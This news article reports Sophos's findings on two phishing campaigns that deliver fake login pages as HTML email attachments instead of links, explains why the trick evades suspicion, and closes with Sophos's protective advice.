The cybersecurity firm Sophos has observed two new phishing campaigns in the wild that use a new trick to help them avoid detection.
Email phishing scams typically employ a three-stage process to get potential targets to give up their credentials which begins with an email that contains a URL they want users to click through. Clicking on this link will bring potential victims to a fake login page where their credentials are harvested and then sent to another site where the cybercriminals behind the campaign will use them to takeover user accounts.
However, these two new phishing campaigns, one of which Sophos received directly and one was reported by a reader, also use this same three-stage process but with a slight twist.
The cloned website in step two wasn’t reached by clicking a link in an email. Instead, the fake website was attached to the email itself as an HTML attachment.
HTML attachments versus links
By attaching the URL of their phishing sites to emails, the cybercriminals behind these new campaigns are increasing the likelihood that a victim would open their fake web pages. This is because opening an attachment doesn’t feel nearly as dangerous since it’s not a document that could contain macros, a PowerShell file or an executable program.
Theoretically, opening an HTML attachment should simply open up the enclosed web page in the safety of a browser’s sandbox just as if a victim had clicked on a link. However, by using an HTML attachment, users are unable to check out the link in advance to look for a fake or suspicious domain name and the URL in the address bar appears as if it were a local filename.
Sophos warned about the dangers of opening HTML attachments in a new blog post, saying:
To avoid falling victim to these new phishing campaigns, Sophos recommends that users avoid HTM or HTML attachments altogether, never log in to web pages that you arrived at from an email, turn on 2FA when possible, change passwords once you believe you’ve been phished and use a web filter.